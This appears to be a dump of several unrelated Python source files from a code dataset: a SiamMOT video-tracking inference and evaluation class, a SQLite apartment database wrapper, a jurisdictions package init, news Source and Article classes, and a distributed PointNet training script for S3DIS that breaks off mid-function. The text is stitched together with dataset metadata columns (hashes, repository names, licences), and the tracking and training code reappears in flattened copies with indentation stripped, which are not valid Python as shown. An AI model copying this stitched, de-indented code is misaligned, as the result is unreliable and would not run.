    def __init__(
        self, cfg, model, dataset, output_dir, data_filter_fn=None,
        public_detection=None, distributed=False
    ):
        self._cfg = cfg
        self._transform = build_siam_augmentation(cfg, is_train=False)
        self._model = model
        self._dataset = dataset
        self._output_dir = output_dir
        self._distributed = distributed
        self._data_filter_fn = data_filter_fn
        # Optional mapping sample.id -> cached public detections (e.g. MOT17);
        # when set, the model's detection branch is bypassed.
        self._pub_detection = public_detection
        # Track-level filtering thresholds used by _postprocess_tracks.
        self._track_conf = 0.7
        self._track_len = 5
        self._logger = logging.getLogger(__name__)
        # sample.id -> post-processed DataSample of tracks.
        self.results = dict()

    def _eval_det_ap(self):
        """Evaluate detection average precision over IoU thresholds 0.50..0.90 (step 0.05).

        Returns (per-threshold AP array, human-readable summary string).
        NOTE(review): np.arange(0.5, 0.95, 0.05) excludes 0.95, so the
        "0.50:0.95" label slightly overstates the range -- confirm intended.
        """
        from ..eval.eval_det_ap import eval_det_ap
        iou_threshold = np.arange(0.5, 0.95, 0.05).tolist()
        ap_matrix = eval_det_ap(
            self._dataset, self.results,
            data_filter_fn=self._data_filter_fn,
            iou_threshold=iou_threshold
        )
        ap = np.mean(ap_matrix, axis=0)

        ap_str_summary = "\n"
        ap_str_summary += 'Detection AP @[ IoU=0.50:0.95 ] = {:.2f}\n'.format(
            np.mean(ap) * 100
        )
        ap_str_summary += 'Detection AP @[ IoU=0.50 ] = {:.2f}\n'.format(
            ap[0] * 100
        )
        ap_str_summary += 'Detection AP @[ IoU=0.75 ] = {:.2f}\n'.format(
            ap[5] * 100
        )

        return ap, ap_str_summary

    def _eval_clear_mot(self):
        """Evaluate CLEAR-MOT tracking metrics over self.results; returns (metrics, summary str)."""
        motmetric, motstrsummary = eval_clears_mot(
            self._dataset, self.results,
            data_filter_fn=self._data_filter_fn
        )
        return motmetric, motstrsummary

    def _inference_on_video(self, sample):
        """Run inference on one video, loading from / saving to the per-sample JSON cache."""
        cache_path = os.path.join(self._output_dir, '{}.json'.format(sample.id))
        os.makedirs(os.path.dirname(cache_path), exist_ok=True)

        if os.path.exists(cache_path):
            sample_result = DataSample.load(cache_path)
        else:
            given_detection = None
            if self._pub_detection:
                given_detection = self._pub_detection[sample.id]
            sample_result = do_inference(
                self._cfg, self._model, sample,
                transforms=self._transform,
                given_detection=given_detection
            )
            sample_result.dump(cache_path)
        return sample_result

    def _postprocess_tracks(self, tracks: DataSample):
        """
        post_process the tracks to filter out short and non-confident tracks
        :param tracks: un-filtered tracks
        :return: filtered tracks that would be used for evaluation
        """
        track_ids = set()
        for _entity in tracks.entities:
            # Negative ids mark unmatched/dummy entities and are dropped.
            if _entity.id not in track_ids and _entity.id >= 0:
                track_ids.add(_entity.id)

        filter_tracks = tracks.get_copy_without_entities()
        for _id in track_ids:
            _id_entities = tracks.get_entities_with_id(_id)
            _track_conf = np.mean([_e.confidence for _e in _id_entities])
            # Keep a track only if it is both long enough and confident enough.
            if len(_id_entities) >= self._track_len \
                    and _track_conf >= self._track_conf:
                for _entity in _id_entities:
                    filter_tracks.add_entity(_entity)
        return filter_tracks

    def __call__(self):
        # todo: enable the inference in an efficient distributed framework
        for (sample_id, sample) in tqdm(self._dataset):
            # clean up the memory
            self._model.reset_siammot_status()
            sample_result = self._inference_on_video(sample)

            sample_result = self._postprocess_tracks(sample_result)
            self.results.update({sample.id: sample_result})

        self._logger.info(
            "\n---------------- Start evaluating ----------------\n"
        )
        motmetric, motstrsummary = self._eval_clear_mot()
        self._logger.info(motstrsummary)

        # Detection AP evaluation is available but disabled by default:
        # ap, ap_str_summary = self._eval_det_ap()
        # self._logger.info(ap_str_summary)
        self._logger.info(
            "\n---------------- Finish evaluating ----------------\n"
        )
| 36.90566 | 81 | 0.595859 | import logging
import os
import time
import numpy as np
import torch
from gluoncv.torch.data.gluoncv_motion_dataset.dataset import DataSample
from tqdm import tqdm
from ..data.adapters.augmentation.build_augmentation import \
build_siam_augmentation
from ..data.build_inference_data_loader import build_video_loader
from ..eval.eval_clears_mot import eval_clears_mot
from ..utils.boxlists_to_entities import (
boxlists_to_entities,
convert_given_detections_to_boxlist,
)
def do_inference(
cfg, model, sample: DataSample, transforms=None,
given_detection: DataSample = None
) -> DataSample:
logger = logging.getLogger(__name__)
model.eval()
gpu_device = torch.device('cuda')
video_loader = build_video_loader(cfg, sample, transforms)
sample_result = DataSample(
sample.id, raw_info=None, metadata=sample.metadata
)
network_time = 0
for (video_clip, frame_id, timestamps) in tqdm(video_loader):
frame_id = frame_id.item()
timestamps = torch.squeeze(timestamps, dim=0).tolist()
video_clip = torch.squeeze(video_clip, dim=0)
frame_detection = None
if given_detection:
frame_detection = given_detection.get_entities_for_frame_num(
frame_id
)
frame_detection = convert_given_detections_to_boxlist(
frame_detection,
sample.width,
sample.height
)
frame_height, frame_width = video_clip.shape[-2:]
frame_detection = frame_detection.resize(
(frame_width, frame_height)
)
frame_detection = [frame_detection.to(gpu_device)]
with torch.no_grad():
video_clip = video_clip.to(gpu_device)
torch.cuda.synchronize()
network_start_time = time.time()
output_boxlists = model(video_clip, given_detection=frame_detection)
torch.cuda.synchronize()
network_time += time.time() - network_start_time
output_boxlists = [
o.resize([sample.width, sample.height]).convert('xywh')
for o in output_boxlists]
output_boxlists = [o.to(torch.device("cpu")) for o in output_boxlists]
output_entities = boxlists_to_entities(
output_boxlists, frame_id, timestamps
)
for entity in output_entities:
sample_result.add_entity(entity)
logger.info(
'Sample_id {} / Speed {} fps'.format(
sample.id, len(sample) / (network_time)
)
)
return sample_result
class DatasetInference(object):
def __init__(
self, cfg, model, dataset, output_dir, data_filter_fn=None,
public_detection=None, distributed=False
):
self._cfg = cfg
self._transform = build_siam_augmentation(cfg, is_train=False)
self._model = model
self._dataset = dataset
self._output_dir = output_dir
self._distributed = distributed
self._data_filter_fn = data_filter_fn
self._pub_detection = public_detection
self._track_conf = 0.7
self._track_len = 5
self._logger = logging.getLogger(__name__)
self.results = dict()
def _eval_det_ap(self):
from ..eval.eval_det_ap import eval_det_ap
iou_threshold = np.arange(0.5, 0.95, 0.05).tolist()
ap_matrix = eval_det_ap(
self._dataset, self.results,
data_filter_fn=self._data_filter_fn,
iou_threshold=iou_threshold
)
ap = np.mean(ap_matrix, axis=0)
ap_str_summary = "\n"
ap_str_summary += 'Detection AP @[ IoU=0.50:0.95 ] = {:.2f}\n'.format(
np.mean(ap) * 100
)
ap_str_summary += 'Detection AP @[ IoU=0.50 ] = {:.2f}\n'.format(
ap[0] * 100
)
ap_str_summary += 'Detection AP @[ IoU=0.75 ] = {:.2f}\n'.format(
ap[5] * 100
)
return ap, ap_str_summary
def _eval_clear_mot(self):
motmetric, motstrsummary = eval_clears_mot(
self._dataset, self.results,
data_filter_fn=self._data_filter_fn
)
return motmetric, motstrsummary
def _inference_on_video(self, sample):
cache_path = os.path.join(self._output_dir, '{}.json'.format(sample.id))
os.makedirs(os.path.dirname(cache_path), exist_ok=True)
if os.path.exists(cache_path):
sample_result = DataSample.load(cache_path)
else:
given_detection = None
if self._pub_detection:
given_detection = self._pub_detection[sample.id]
sample_result = do_inference(
self._cfg, self._model, sample,
transforms=self._transform,
given_detection=given_detection
)
sample_result.dump(cache_path)
return sample_result
def _postprocess_tracks(self, tracks: DataSample):
track_ids = set()
for _entity in tracks.entities:
if _entity.id not in track_ids and _entity.id >= 0:
track_ids.add(_entity.id)
filter_tracks = tracks.get_copy_without_entities()
for _id in track_ids:
_id_entities = tracks.get_entities_with_id(_id)
_track_conf = np.mean([_e.confidence for _e in _id_entities])
if len(_id_entities) >= self._track_len \
and _track_conf >= self._track_conf:
for _entity in _id_entities:
filter_tracks.add_entity(_entity)
return filter_tracks
def __call__(self):
for (sample_id, sample) in tqdm(self._dataset):
self._model.reset_siammot_status()
sample_result = self._inference_on_video(sample)
sample_result = self._postprocess_tracks(sample_result)
self.results.update({sample.id: sample_result})
self._logger.info(
"\n---------------- Start evaluating ----------------\n"
)
motmetric, motstrsummary = self._eval_clear_mot()
self._logger.info(motstrsummary)
self._logger.info(
"\n---------------- Finish evaluating ----------------\n"
)
| true | true |
1c3c8ad81850ae5b4a7fa1ea214bcf1635f63d1c | 422 | py | Python | src/homescraper/db.py | asabellico/homescraper | 2c350f359bdd21eaef56fc3809d4373adde1ca2d | [
"MIT"
] | null | null | null | src/homescraper/db.py | asabellico/homescraper | 2c350f359bdd21eaef56fc3809d4373adde1ca2d | [
"MIT"
] | null | null | null | src/homescraper/db.py | asabellico/homescraper | 2c350f359bdd21eaef56fc3809d4373adde1ca2d | [
"MIT"
] | null | null | null | import sqlalchemy
import dataclasses_sql
from homescraper.datatypes import Apartment
class ApartmentDb:
    """Thin persistence wrapper storing scraped Apartment records in a SQLite database."""

    def __init__(self, db_path):
        """Open (or create) the SQLite file at *db_path* and reflect its schema.

        NOTE(review): passing the engine positionally binds the MetaData,
        an API removed in SQLAlchemy 2.0 (use MetaData() plus
        reflect(bind=engine) there) -- confirm which SQLAlchemy version
        dataclasses_sql requires before upgrading.
        """
        self.engine = sqlalchemy.create_engine(f'sqlite:///{db_path}')
        self.metadata = sqlalchemy.MetaData(self.engine)
        self.metadata.reflect()

    def add_apartment(self, apartment):
        """Insert *apartment* unless an identical record exists (check_exists=True);
        returns whatever dataclasses_sql.insert returns."""
        return dataclasses_sql.insert(self.metadata, apartment, check_exists=True)
1c3c8b6014ce0b4984adf84fafe8468335b88fa8 | 269 | py | Python | jurisdictions/__init__.py | mapto/CashWash | d10281f88ad881a7d01022a66faff09b9fcc49e6 | [
"MIT"
] | 7 | 2019-01-22T11:13:43.000Z | 2019-02-25T13:12:58.000Z | jurisdictions/__init__.py | mapto/CashWash | d10281f88ad881a7d01022a66faff09b9fcc49e6 | [
"MIT"
] | null | null | null | jurisdictions/__init__.py | mapto/CashWash | d10281f88ad881a7d01022a66faff09b9fcc49e6 | [
"MIT"
] | null | null | null | __all__ = ['statements', 'persistence']
from settings import data_path
from settings import debug
from .statements import get_jurisdictions_statement
from .persistence import get_jurisdiction_code, jurisdiction_by_code
from .persistence import cached_jurisdictions
| 24.454545 | 68 | 0.847584 | __all__ = ['statements', 'persistence']
from settings import data_path
from settings import debug
from .statements import get_jurisdictions_statement
from .persistence import get_jurisdiction_code, jurisdiction_by_code
from .persistence import cached_jurisdictions
| true | true |
1c3c8ba12856c5752722acfb7f7f48a3e460dd5a | 561 | py | Python | app/models.py | xamaan585/News-Bulleting | 3ff0ab545a94c6eef8b536342bd47bc37f70e448 | [
"Unlicense"
] | null | null | null | app/models.py | xamaan585/News-Bulleting | 3ff0ab545a94c6eef8b536342bd47bc37f70e448 | [
"Unlicense"
] | null | null | null | app/models.py | xamaan585/News-Bulleting | 3ff0ab545a94c6eef8b536342bd47bc37f70e448 | [
"Unlicense"
] | null | null | null | class Source:
'''
Source class to define source objects
'''
def __init__(self,id,name,url,description):
self.id = id
self.name = name
self.url = url
self.description = description
class Article:
    """A single news article and its display metadata."""

    def __init__(self, image, title, author, description, publicshedAt, url):
        """
        Args:
            image: URL of the article's image.
            title: article headline.
            author: article author.
            description: short summary of the article.
            publicshedAt: publication timestamp (original misspelled name is
                kept for backward compatibility with existing callers).
            url: link to the full article.
        """
        self.image = image
        self.title = title
        self.author = author
        self.description = description
        self.publicshedAt = publicshedAt
        self.url = url

    def __repr__(self):
        # Debug-friendly representation; attributes unchanged for callers.
        return f"{type(self).__name__}(title={self.title!r}, author={self.author!r})"
def __init__(self,id,name,url,description):
self.id = id
self.name = name
self.url = url
self.description = description
class Article:
def __init__(self,image,title,author,description,publicshedAt,url):
self.image = image
self.title = title
self.author = author
self.description = description
self.publicshedAt = publicshedAt
self.url = url | true | true |
1c3c8bd10751f52f27ffb09b2e9937aacc9e0a85 | 21,610 | py | Python | scripts/train_s3dis.py | PointCloudYC/PointNet-modern.pytorch | 1a0b373fcb21f24b667a0bb4831211da5b92f98d | [
"Apache-2.0"
] | 2 | 2021-05-20T14:36:23.000Z | 2022-02-01T11:33:56.000Z | scripts/train_s3dis.py | PointCloudYC/PointNet-modern.pytorch | 1a0b373fcb21f24b667a0bb4831211da5b92f98d | [
"Apache-2.0"
] | null | null | null | scripts/train_s3dis.py | PointCloudYC/PointNet-modern.pytorch | 1a0b373fcb21f24b667a0bb4831211da5b92f98d | [
"Apache-2.0"
] | null | null | null | """
Distributed training script for semantic segmentation on S3DIS dataset
"""
import os
import sys
import time
from datetime import datetime
import json
import random
import numpy as np
# pytorch
import torch
import torch.nn as nn
from torchvision import transforms
import torch.distributed as dist
from torch.utils.tensorboard import SummaryWriter
from torch.nn.parallel import DistributedDataParallel
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(ROOT_DIR)
# configs and logging
import argparse
from utils.config import config, update_config
from utils.logger import setup_logger
from models import PointNetSemSeg, PointNet2SSGSemSeg, PointNet2MSGSemSeg , get_masked_CE_loss # models/build.py
from datasets import S3DISSemSeg
import datasets.data_utils as d_utils
# metrics and lr scheduler
from utils.util import AverageMeter, s3dis_metrics, sub_s3dis_metrics, s3dis_part_metrics
from utils.lr_scheduler import get_scheduler
def parse_config():
    """Load configuration for S3DIS semantic-segmentation training.

    Precedence, lowest to highest:
      1. defaults in the global ``config`` dict (utils/config.py)
      2. the yaml file given by --cfg
      3. explicit command-line arguments

    Also seeds all RNGs with --rng_seed for reproducibility.

    Returns:
        tuple: (args, config) where ``args`` is the argparse.Namespace and
        ``config`` is the updated global config dict.
    """
    parser = argparse.ArgumentParser('S3DIS semantic segmentation training')
    parser.add_argument('--cfg', type=str, default='project/cfgs/s3dis/pointnet2_msg.yaml', help='config file')
    parser.add_argument('--data_root', type=str, default='data', help='root director of dataset')
    parser.add_argument('--num_workers', type=int, default=4, help='num of workers to use')
    parser.add_argument('--batch_size', type=int, help='batch_size')
    parser.add_argument('--num_points', type=int, help='num_points')
    parser.add_argument('--num_steps', type=int, help='num_steps')
    parser.add_argument('--base_learning_rate', type=float, help='base learning rate')
    parser.add_argument('--weight_decay', type=float, help='weight_decay')
    parser.add_argument('--epochs', type=int, help='number of training epochs')
    parser.add_argument('--start_epoch', type=int, help='used for resume')

    # io
    parser.add_argument('--load_path', default='', type=str, metavar='PATH',
                        help='path to latest checkpoint (default: none)')
    parser.add_argument('--print_freq', type=int, default=10, help='print frequency')
    parser.add_argument('--save_freq', type=int, default=10, help='save frequency')
    parser.add_argument('--val_freq', type=int, default=10, help='val frequency')
    parser.add_argument('--log_dir', type=str, default='log', help='log dir [default: log]')

    # misc
    parser.add_argument("--local_rank", type=int, default=0, help='local rank for DistributedDataParallel')
    parser.add_argument("--rng_seed", type=int, default=0, help='manual seed')

    # parse_known_args so extra launcher arguments do not abort parsing
    args, unparsed = parser.parse_known_args()

    # update config dict with the yaml file
    update_config(args.cfg)

    # update config dict with args arguments
    config.data_root = args.data_root
    config.num_workers = args.num_workers
    config.load_path = args.load_path
    config.print_freq = args.print_freq
    config.save_freq = args.save_freq
    config.val_freq = args.val_freq
    config.rng_seed = args.rng_seed
    config.local_rank = args.local_rank

    # model name is the yaml file stem, e.g. 'pointnet2_msg';
    # supports: pointnet, pointnet2_{ssg,msg}
    model_name = args.cfg.split('.')[-2].split('/')[-1]
    config.model_name = model_name

    # timestamped run dir, e.g. log/s3dis/pointnet2_msg_20210518221044
    current_time = datetime.now().strftime('%Y%m%d%H%M%S')
    config.log_dir = os.path.join(args.log_dir, 's3dis', f'{model_name}_{current_time}')

    # Override config values only when the user explicitly passed them.
    # Compare with None (not truthiness) so explicit zeros such as
    # --weight_decay 0 or --start_epoch 0 are honored instead of ignored.
    if args.batch_size is not None:
        config.batch_size = args.batch_size
    if args.num_points is not None:
        config.num_points = args.num_points
    if args.num_steps is not None:
        config.num_steps = args.num_steps
    if args.base_learning_rate is not None:
        config.base_learning_rate = args.base_learning_rate
    if args.weight_decay is not None:
        config.weight_decay = args.weight_decay
    if args.epochs is not None:
        config.epochs = args.epochs
    if args.start_epoch is not None:
        config.start_epoch = args.start_epoch

    print(args)
    print(config)

    # seed every RNG for reproducibility
    torch.manual_seed(args.rng_seed)
    torch.cuda.manual_seed_all(args.rng_seed)
    random.seed(args.rng_seed)
    np.random.seed(args.rng_seed)

    return args, config
def get_loader(config):
    """Build distributed train/val DataLoaders for S3DIS.

    Training data gets random rotation + scale/jitter augmentation; the
    validation set only converts to tensors.

    Args:
        config: global config dict with dataset and augmentation settings.

    Returns:
        tuple: (train_loader, val_loader), each backed by a DistributedSampler.
    """
    # set the data loader
    train_transforms = transforms.Compose([
        d_utils.PointcloudToTensor(),
        d_utils.PointcloudRandomRotate(x_range=config.x_angle_range, y_range=config.y_angle_range,
                                       z_range=config.z_angle_range),
        d_utils.PointcloudScaleAndJitter(scale_low=config.scale_low, scale_high=config.scale_high,
                                         std=config.noise_std, clip=config.noise_clip,
                                         augment_symmetries=config.augment_symmetries),
    ])
    test_transforms = transforms.Compose([
        d_utils.PointcloudToTensor(),
    ])
    train_dataset = S3DISSemSeg(input_features_dim=config.input_features_dim,
                                subsampling_parameter=config.sampleDl, color_drop=config.color_drop,
                                in_radius=config.in_radius, num_points=config.num_points,
                                num_steps=config.num_steps, num_epochs=config.epochs,
                                transforms=train_transforms, split='train')
    # NOTE(review): num_epochs=20 here is hard-coded for validation voting
    # (validate() indexes dataset.epoch modulo 20) — confirm before changing.
    val_dataset = S3DISSemSeg(input_features_dim=config.input_features_dim,
                              subsampling_parameter=config.sampleDl, color_drop=config.color_drop,
                              in_radius=config.in_radius, num_points=config.num_points,
                              num_steps=config.num_steps, num_epochs=20,
                              transforms=test_transforms, split='val')
    # shuffle=False in both sampler and loader: the dataset presumably
    # controls per-epoch sampling itself via its `epoch` attribute — confirm.
    train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=False)
    train_loader = torch.utils.data.DataLoader(train_dataset,
                                               batch_size=config.batch_size,
                                               shuffle=False,
                                               num_workers=config.num_workers,
                                               pin_memory=True,
                                               sampler=train_sampler,
                                               drop_last=True)
    val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, shuffle=False)
    val_loader = torch.utils.data.DataLoader(val_dataset,
                                             batch_size=config.batch_size,
                                             shuffle=False,
                                             num_workers=config.num_workers,
                                             pin_memory=True,
                                             sampler=val_sampler,
                                             drop_last=False)
    return train_loader, val_loader
def load_checkpoint(config, model, optimizer, scheduler):
    """Restore model/optimizer/scheduler state from config.load_path.

    Sets config.start_epoch to the checkpoint epoch + 1 so training resumes
    from the next epoch.
    """
    logger.info("=> loading checkpoint '{}'".format(config.load_path))
    ckpt = torch.load(config.load_path, map_location='cpu')
    # Resume from the epoch after the one stored in the checkpoint.
    config.start_epoch = ckpt['epoch'] + 1
    for key, target in (('model', model), ('optimizer', optimizer), ('scheduler', scheduler)):
        target.load_state_dict(ckpt[key])
    logger.info("=> loaded successfully '{}' (epoch {})".format(config.load_path, ckpt['epoch']))
    # Free the CPU copy of the checkpoint and any cached CUDA memory.
    del ckpt
    torch.cuda.empty_cache()
def save_checkpoint(config, epoch, model, optimizer, scheduler):
    """Persist training state: a rolling 'current.pth' plus periodic snapshots."""
    logger.info('==> Saving...')
    state = {
        'config': config,
        'model': model.state_dict(),
        'optimizer': optimizer.state_dict(),
        'scheduler': scheduler.state_dict(),
        'epoch': epoch,
    }
    # Always overwrite the latest checkpoint.
    torch.save(state, os.path.join(config.log_dir, 'current.pth'))
    # Keep an immutable snapshot every save_freq epochs.
    if epoch % config.save_freq == 0:
        snapshot_path = os.path.join(config.log_dir, f'ckpt_epoch_{epoch}.pth')
        torch.save(state, snapshot_path)
        logger.info("Saved in {}".format(snapshot_path))
def main(config):
    """Full distributed training routine: build data/model/optimizer, train,
    validate periodically, checkpoint on rank 0, then run a final 20-vote
    evaluation.
    """
    train_loader, val_loader = get_loader(config)
    n_data = len(train_loader.dataset)
    logger.info(f"length of training dataset: {n_data}")
    n_data = len(val_loader.dataset)
    logger.info(f"length of validation dataset: {n_data}")
    # Model is selected by the yaml file stem (see parse_config).
    if config.model_name == 'pointnet':
        model = PointNetSemSeg(config,config.input_features_dim)
    elif config.model_name =='pointnet2_ssg':
        model = PointNet2SSGSemSeg(config,config.input_features_dim)
    elif config.model_name =='pointnet2_msg':
        model = PointNet2MSGSemSeg(config,config.input_features_dim)
    else:
        raise NotImplementedError("error")
    # print(model)
    criterion = get_masked_CE_loss()
    model.cuda()
    criterion.cuda()
    if config.optimizer == 'sgd':
        # SGD lr is scaled linearly with the global batch size (base: 8).
        optimizer = torch.optim.SGD(model.parameters(),
                                    lr=config.batch_size * dist.get_world_size() / 8 * config.base_learning_rate,
                                    momentum=config.momentum,
                                    weight_decay=config.weight_decay)
    elif config.optimizer == 'adam':
        optimizer = torch.optim.Adam(model.parameters(),
                                     lr=config.base_learning_rate,
                                     weight_decay=config.weight_decay)
    elif config.optimizer == 'adamW':
        optimizer = torch.optim.AdamW(model.parameters(),
                                      lr=config.base_learning_rate,
                                      weight_decay=config.weight_decay)
    else:
        raise NotImplementedError(f"Optimizer {config.optimizer} not supported")
    scheduler = get_scheduler(optimizer, len(train_loader), config)
    # add find_unused_parameters=True to overcome the error "RuntimeError: Expected to have finished reduction in the prior iteration before starting a new one"
    model = DistributedDataParallel(model, device_ids=[config.local_rank], broadcast_buffers=False,find_unused_parameters=True)
    # Per-cloud running (smoothed) logits used by validate() across epochs.
    runing_vote_logits = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
                          val_loader.dataset.sub_clouds_points_labels]
    # optionally resume from a checkpoint
    if config.load_path:
        assert os.path.isfile(config.load_path)
        load_checkpoint(config, model, optimizer, scheduler)
        logger.info("==> checking loaded ckpt")
        validate('resume', val_loader, model, criterion, runing_vote_logits, config, num_votes=2)
    # tensorboard (only rank 0 writes)
    if dist.get_rank() == 0:
        summary_writer = SummaryWriter(log_dir=config.log_dir)
    else:
        summary_writer = None
    # routine
    for epoch in range(config.start_epoch, config.epochs + 1):
        train_loader.sampler.set_epoch(epoch)
        val_loader.sampler.set_epoch(epoch)
        # Dataset-side epoch index is 0-based while `epoch` here is 1-based.
        train_loader.dataset.epoch = epoch - 1
        tic = time.time()
        loss = train(epoch, train_loader, model, criterion, optimizer, scheduler, config)
        logger.info('epoch {}, total time {:.2f}, lr {:.5f}'.format(epoch,
                                                                    (time.time() - tic),
                                                                    optimizer.param_groups[0]['lr']))
        if epoch % config.val_freq == 0:
            validate(epoch, val_loader, model, criterion, runing_vote_logits, config, num_votes=2)
        if dist.get_rank() == 0:
            # save model
            save_checkpoint(config, epoch, model, optimizer, scheduler)
            if summary_writer is not None:
                # tensorboard logger
                summary_writer.add_scalar('ins_loss', loss, epoch)
                summary_writer.add_scalar('learning_rate', optimizer.param_groups[0]['lr'], epoch)
    # Final evaluation with heavier test-time augmentation voting.
    validate('Last', val_loader, model, criterion, runing_vote_logits, config, num_votes=20)
def train(epoch, train_loader, model, criterion, optimizer, scheduler, config):
    """Run one training epoch.

    Args:
        epoch (int): current (1-based) epoch, used only for logging.
        train_loader: training DataLoader yielding
            (points, mask, features, labels, cloud_label, input_inds).
        model: (DDP-wrapped) segmentation network.
        criterion: masked cross-entropy loss.
        optimizer: optimizer stepped once per batch.
        scheduler: LR scheduler, also stepped once per batch.
        config: global config dict.

    Returns:
        float: average loss over the epoch.
    """
    model.train()
    batch_time = AverageMeter()
    data_time = AverageMeter()
    loss_meter = AverageMeter()
    end = time.time()
    for idx, (points, mask, features, points_labels, cloud_label, input_inds) in enumerate(train_loader):
        data_time.update(time.time() - end)
        bsz = points.size(0)
        # forward
        points = points.cuda(non_blocking=True)
        mask = mask.cuda(non_blocking=True)
        features = features.cuda(non_blocking=True)
        points_labels = points_labels.cuda(non_blocking=True)
        # PointNet additionally returns the feature-transform matrix, which
        # the loss regularizes toward orthogonality.
        if config.model_name == 'pointnet':
            pred,_,transform_feature = model(points,mask, features)
            loss = criterion(pred,points_labels,mask,transform_feature)
        else:
            pred = model(points,mask, features)
            loss = criterion(pred,points_labels,mask)
        optimizer.zero_grad()
        loss.backward()
        # Clip gradient norm at 10 to stabilize training.
        torch.nn.utils.clip_grad_norm_(model.parameters(), 10)
        optimizer.step()
        scheduler.step()
        # update meters
        loss_meter.update(loss.item(), bsz)
        batch_time.update(time.time() - end)
        end = time.time()
        # print info
        if idx % config.print_freq == 0:
            logger.info(f'Train: [{epoch}/{config.epochs + 1}][{idx}/{len(train_loader)}]\t'
                        f'T {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                        f'DT {data_time.val:.3f} ({data_time.avg:.3f})\t'
                        f'loss {loss_meter.val:.3f} ({loss_meter.avg:.3f})')
            # logger.info(f'[{cloud_label}]: {input_inds}')
    return loss_meter.avg
def validate(epoch, test_loader, model, criterion, runing_vote_logits, config, num_votes=10):
    """Run one validation pass with test-time-augmentation voting.

    Each vote runs the model over the (augmented, for v > 0) validation set
    and accumulates per-point logits; metrics are reported at part, sub-cloud
    and full-cloud level after every vote.

    Args:
        epoch (int or str): current epoch number or a tag ('resume'/'Last').
        test_loader: validation DataLoader.
        model: (DDP-wrapped) segmentation network.
        criterion: masked cross-entropy loss.
        runing_vote_logits: per-cloud exponentially smoothed logits,
            updated in place across calls.
        config: global config dict.
        num_votes (int, optional): number of voting rounds. Defaults to 10.

    Returns:
        float: mIoU over the full-resolution validation clouds (last vote).
    """
    vote_logits_sum = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
                       test_loader.dataset.sub_clouds_points_labels]
    # + 1e-6 avoids division by zero for points never covered by any vote.
    vote_counts = [np.zeros((1, l.shape[0]), dtype=np.float32) + 1e-6 for l in
                   test_loader.dataset.sub_clouds_points_labels]
    vote_logits = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
                   test_loader.dataset.sub_clouds_points_labels]
    validation_proj = test_loader.dataset.projections
    validation_labels = test_loader.dataset.clouds_points_labels
    # Exponential-smoothing factor for the running logits.
    test_smooth = 0.95

    # Per-class point counts, used to weight the part-level IoU.
    val_proportions = np.zeros(config.num_classes, dtype=np.float32)
    for label_value in range(config.num_classes):
        val_proportions[label_value] = np.sum(
            [np.sum(labels == label_value) for labels in test_loader.dataset.clouds_points_labels])

    batch_time = AverageMeter()
    losses = AverageMeter()

    model.eval()
    with torch.no_grad():
        end = time.time()
        RT = d_utils.BatchPointcloudRandomRotate(x_range=config.x_angle_range, y_range=config.y_angle_range,
                                                 z_range=config.z_angle_range)
        TS = d_utils.BatchPointcloudScaleAndJitter(scale_low=config.scale_low, scale_high=config.scale_high,
                                                   std=config.noise_std, clip=config.noise_clip,
                                                   augment_symmetries=config.augment_symmetries)
        for v in range(num_votes):
            # The dataset pre-generates 20 epochs of spheres; pick one per vote.
            test_loader.dataset.epoch = (0 + v) if isinstance(epoch, str) else (epoch + v) % 20
            predictions = []
            targets = []
            for idx, (points, mask, features, points_labels, cloud_label, input_inds) in enumerate(test_loader):
                # augment for voting (the first vote uses unaugmented data)
                if v > 0:
                    points = RT(points)
                    points = TS(points)
                    # Re-append the transformed xyz to the features when the
                    # feature vector includes point coordinates.
                    if config.input_features_dim <= 5:
                        pass
                    elif config.input_features_dim == 6:
                        color = features[:, :3, :]
                        features = torch.cat([color, points.transpose(1, 2).contiguous()], 1)
                    elif config.input_features_dim == 7:
                        color_h = features[:, :4, :]
                        features = torch.cat([color_h, points.transpose(1, 2).contiguous()], 1)
                    else:
                        raise NotImplementedError(
                            f"input_features_dim {config.input_features_dim} in voting not supported")
                # forward
                points = points.cuda(non_blocking=True)
                mask = mask.cuda(non_blocking=True)
                features = features.cuda(non_blocking=True)
                points_labels = points_labels.cuda(non_blocking=True)
                cloud_label = cloud_label.cuda(non_blocking=True)
                input_inds = input_inds.cuda(non_blocking=True)

                if config.model_name == 'pointnet':
                    pred,_,transform_feature = model(points,mask, features)
                    loss = criterion(pred,points_labels,mask,transform_feature)
                else:
                    pred = model(points,mask, features)
                    loss = criterion(pred,points_labels,mask)
                losses.update(loss.item(), points.size(0))

                # collect per-sample logits back onto each sub-cloud
                bsz = points.shape[0]
                for ib in range(bsz):
                    # np.bool was deprecated in NumPy 1.20 and removed in
                    # 1.24; the builtin bool is the documented replacement.
                    mask_i = mask[ib].cpu().numpy().astype(bool)
                    logits = pred[ib].cpu().numpy()[:, mask_i]
                    inds = input_inds[ib].cpu().numpy()[mask_i]
                    c_i = cloud_label[ib].item()
                    vote_logits_sum[c_i][:, inds] = vote_logits_sum[c_i][:, inds] + logits
                    vote_counts[c_i][:, inds] += 1
                    vote_logits[c_i] = vote_logits_sum[c_i] / vote_counts[c_i]
                    runing_vote_logits[c_i][:, inds] = test_smooth * runing_vote_logits[c_i][:, inds] + \
                                                      (1 - test_smooth) * logits
                    predictions += [logits]
                    targets += [test_loader.dataset.sub_clouds_points_labels[c_i][inds]]

                # measure elapsed time
                batch_time.update(time.time() - end)
                end = time.time()
                if idx % config.print_freq == 0:
                    logger.info(
                        f'Test: [{idx}/{len(test_loader)}]\t'
                        f'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                        f'Loss {losses.val:.4f} ({losses.avg:.4f})')
            pIoUs, pmIoU = s3dis_part_metrics(config.num_classes, predictions, targets, val_proportions)

            logger.info(f'E{epoch} V{v} * part_mIoU {pmIoU:.3%}')
            logger.info(f'E{epoch} V{v} * part_msIoU {pIoUs}')

            runsubIoUs, runsubmIoU = sub_s3dis_metrics(config.num_classes, runing_vote_logits,
                                                       test_loader.dataset.sub_clouds_points_labels, val_proportions)
            logger.info(f'E{epoch} V{v} * running sub_mIoU {runsubmIoU:.3%}')
            logger.info(f'E{epoch} V{v} * running sub_msIoU {runsubIoUs}')

